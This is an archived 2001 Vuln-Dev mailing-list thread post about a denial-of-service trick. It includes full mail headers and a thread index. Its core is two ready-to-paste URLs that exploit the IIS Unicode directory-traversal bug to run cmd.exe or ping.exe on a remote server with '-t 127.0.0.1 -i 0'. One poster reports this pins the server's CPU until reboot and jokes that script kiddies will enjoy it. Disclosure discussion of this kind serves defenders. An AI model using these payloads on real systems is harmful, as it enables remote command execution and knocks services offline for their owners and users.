Vulnerability Development mailing list archives
Re: ping -i (TTL) Vulnerability
From: Reddog Hummer <reddog_33 () HOTMAIL COM>
Date: Thu, 22 Feb 2001 07:43:42 -0000
even better. http://xx.xx.xx.xx/scripts/..%c0%af..%c0%af..%c0%af../winnt/system32/ping+-t+127.0.0.1+-i+0 this works when cmd is disabled red
From: Reverend Lola <reverend_lola () YAHOO COM>
Reply-To: Reverend Lola <reverend_lola () YAHOO COM>
To: VULN-DEV () SECURITYFOCUS COM
Subject: Re: ping -i (TTL) Vulnerability
Date: Wed, 21 Feb 2001 15:34:49 -0800
MIME-Version: 1.0
Received: from [66.38.151.7] by hotmail.com (3.2) with ESMTP id
MHotMailBC5DF34C0029400431CE42269707B2660; Wed Feb 21 21:49:23 2001
Received: from lists.securityfocus.com (lists.securityfocus.com
[66.38.151.7])by lists.securityfocus.com (Postfix) with ESMTPid
9DB7C24C599; Wed, 21 Feb 2001 22:35:21 -0700 (MST)
Received: from LISTS.SECURITYFOCUS.COM by LISTS.SECURITYFOCUS.COM
(LISTSERV-TCP/IP release 1.8d) with spool id 26713100 for
VULN-DEV () LISTS SECURITYFOCUS COM; Wed, 21 Feb 2001 22:35:08 -0700
Received: from securityfocus.com (mail.securityfocus.com [66.38.151.9]) by
lists.securityfocus.com (Postfix) with SMTP id D634224D955 for
<vuln-dev () lists securityfocus com>; Wed, 21 Feb 2001 16:31:36 -0700
(MST)
Received: (qmail 23457 invoked by alias); 21 Feb 2001 23:31:50 -0000
Received: (qmail 23453 invoked from network); 21 Feb 2001 23:31:49 -0000
Received: from web12805.mail.yahoo.com (216.136.174.40) by
mail.securityfocus.com with SMTP; 21 Feb 2001 23:31:49 -0000
Received: from [206.204.107.217] by web12805.mail.yahoo.com; Wed, 21 Feb
2001 15:34:49 PST
From owner-vuln-dev () SECURITYFOCUS COM Wed Feb 21 21:51:16 2001
Approved-By: BlueBoar () THIEVCO COM
Delivered-To: vuln-dev () lists securityfocus com
Delivered-To: VULN-DEV () SECURITYFOCUS COM
Message-ID: <20010221233449.3741.qmail () web12805 mail yahoo com>
Sender: VULN-DEV List <VULN-DEV () SECURITYFOCUS COM>
>-----Original Message-----
>From: Damian Menscher [mailto:menscher () UIUC EDU]
>Sent: Wednesday, February 21, 2001 12:20 PM
>To: VULN-DEV () SECURITYFOCUS COM
>Subject: Re: ping -i (TTL) Vulnerability
%<-----SNIP----->%
>No doubt that this would do absolutely nothing from a
remote location.
%<-----SNIP----->%
Actually, it does.
I used the Unicode bug to send the command to a remote
server (NT 4, SP6a, IIS4):
http://xx.xx.xx.xx/scripts/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+ping+-t+127.0.0.1+-i+0
CPU usage on the target server went to 100%, and
stayed there. Task Manager showed ping.exe was using
a HUGE amount of system resources (this increased
memory usage by a bit as well). I tried to stop
ping.exe, and could not. Since ping.exe was started
by IIS, I then tried to stop the web server, but it
was not responding either. The only way to stop it
was to reboot.
I'm sure the script kiddies will have fun with this
one. :)
__________________________________________________
Do You Yahoo!?
Yahoo! Auctions - Buy the things you want at great prices!
http://auctions.yahoo.com/
_________________________________________________________________________ Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.
Current thread:
- Re: ping -i (TTL) Vulnerability, (continued)
- Re: ping -i (TTL) Vulnerability Jason Witty (Feb 21)
- Re: ping -i (TTL) Vulnerability Weiss, Bill (Feb 21)
- Re: ping -i (TTL) Vulnerability erasor (Feb 21)
- Re: ping -i (TTL) Vulnerability Knud Erik Højgaard - CyberCity Support (Feb 22)
- Re: ping -i (TTL) Vulnerability Jeff Oliver (Feb 21)
- Re: ping -i (TTL) Vulnerability Niels Vaes (Feb 21)
- Re: ping -i (TTL) Vulnerability Mark Villanova (Feb 21)
- Re: ping -i (TTL) Vulnerability Leo R. Lundgren (Feb 21)
- Re: ping -i (TTL) Vulnerability Reverend Lola (Feb 21)
- Re: ping -i (TTL) Vulnerability rpc (Feb 22)
- Re: ping -i (TTL) Vulnerability Reddog Hummer (Feb 22)
- Re: ping -i (TTL) Vulnerability -No Strezzz Cazzz (Feb 22)